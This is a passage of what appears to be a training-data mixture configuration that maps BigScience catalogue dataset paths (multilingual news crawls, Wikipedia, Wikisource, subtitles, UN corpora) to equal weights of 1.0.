"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_209_misionesonline_net": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_246_www_eldiarionuevodia_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_86_www_motorpasion_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_257_www_diaridetarragona_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_53_www_expreso_ec": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_367_elcorreoweb_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_159_www_postcrescent_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_422_www_formulatv_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_project_gutenberg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_pseudocrawl-filtered_503_www_zaobao_com_sg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_638_globalvoices_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_78_www_listindiario_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_277_www_entornointeligente_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_404_www_telam_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_431_www_elperiodicoextremadura_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_254_diario_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_169_www_el_carabobeno_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_417_www_radiolaprimerisima_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_21_www_elperiodicodearagon_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_498_www_channelnewsasia_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_304_www_semana_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_386_www_prensalibre_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_urdu-monolingual-corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_286_www_nacion_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_67_www_elpais_cr": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_405_www_emol_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_317_diariocorreo_pe": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_pseudocrawl-filtered_512_kumparan_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_237_www_cronista_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_116_www_latribuna_hn": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indonesian_news_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_172_www_rionegro_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_226_www_ole_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_287_www_cibercuba_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_pseudocrawl-filtered_572_tirto_id": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_157_www_elsoldemexico_com_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_44_ladiaria_com_uy": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_catalan_government_crawling": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_213_www_hola_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_324_gestion_pe": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_28_www_fayerwayer_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-sw_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_354_www_lagaceta_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_534_www_nairaland_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_253_www_debate_com_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_248_www_telesurtv_net": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_406_www_americaeconomia_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_130_www_elperiodicomediterraneo_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_232_tn_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_leipzig_wortschatz_urdu_newscrawl_2016_sentences": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_71_www_rtve_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_220_www_vanguardia_com_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_pseudocrawl-filtered_549_www_cnnindonesia_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_project_gutenberg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vietai_sat": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_tecla": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_203_www_que_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_320_www_paginasiete_bo": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_181_noticiassin_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_the_pile_europarl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_675_www_elespectador_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_146_www_perfil_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_the_pile_europarl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_the_pile_europarl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_brad_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_79_www_laopiniondemurcia_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_229_www_expansion_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_299_www_lne_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_263_www_lasexta_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_the_pile_europarl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_136_valenciaplaza_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_256_www_laprovincia_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_373_www_farodevigo_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_royal_society_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_245_www_noticiasdenavarra_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_pseudocrawl-filtered_515_www_aajtak_in": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_58_www_levante_emv_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_198_www_eleconomista_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_249_www_telecinco_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_288_www_marca_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_ksucca": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_189_www_eleconomista_com_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_scielo": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_103_www_elmostrador_cl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_leipzig_wortschatz_urdu-pk_web_2019_sentences": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_211_www_elcomercio_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_sanad": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_429_cadenaser_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_267_www_elperiodico_com_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_pseudocrawl-filtered_595_mawdoo3_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_215_www_lainformacion_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh-tw_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh-cn_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_255_elcomercio_pe": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indonesian_news_articles_2017": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_409_www_proceso_com_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_510_timesofindia_indiatimes_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_349_www_eltiempo_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_424_www_lavanguardia_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_100_www_aporrea_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vinbigdata_monolingual_vlsp_2020": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_bsbasque": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_497_www_straitstimes_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_396_www_eldiario_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_tashkeela": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_du_reader": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_20_www_clarin_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_689_www_abc_net_au": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_pseudocrawl-filtered_667_www_bhaskar_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_63_www_lanacion_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_333_www_elmundo_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_project_gutenberg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_pseudocrawl-filtered_550_www_lemonde_fr": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_multi_un_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_uncorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_multi_un_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_catalan_general_crawling": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_multi_un_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ne_unsupervised_cross_lingual_representation_learning_at_scale": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_multi_un_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_multi_un_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_iitb_english_hindi_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_uncorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_uncorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_no_code_stackexchange": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_uncorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_uncorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_binhvq_news_corpus": 1.,
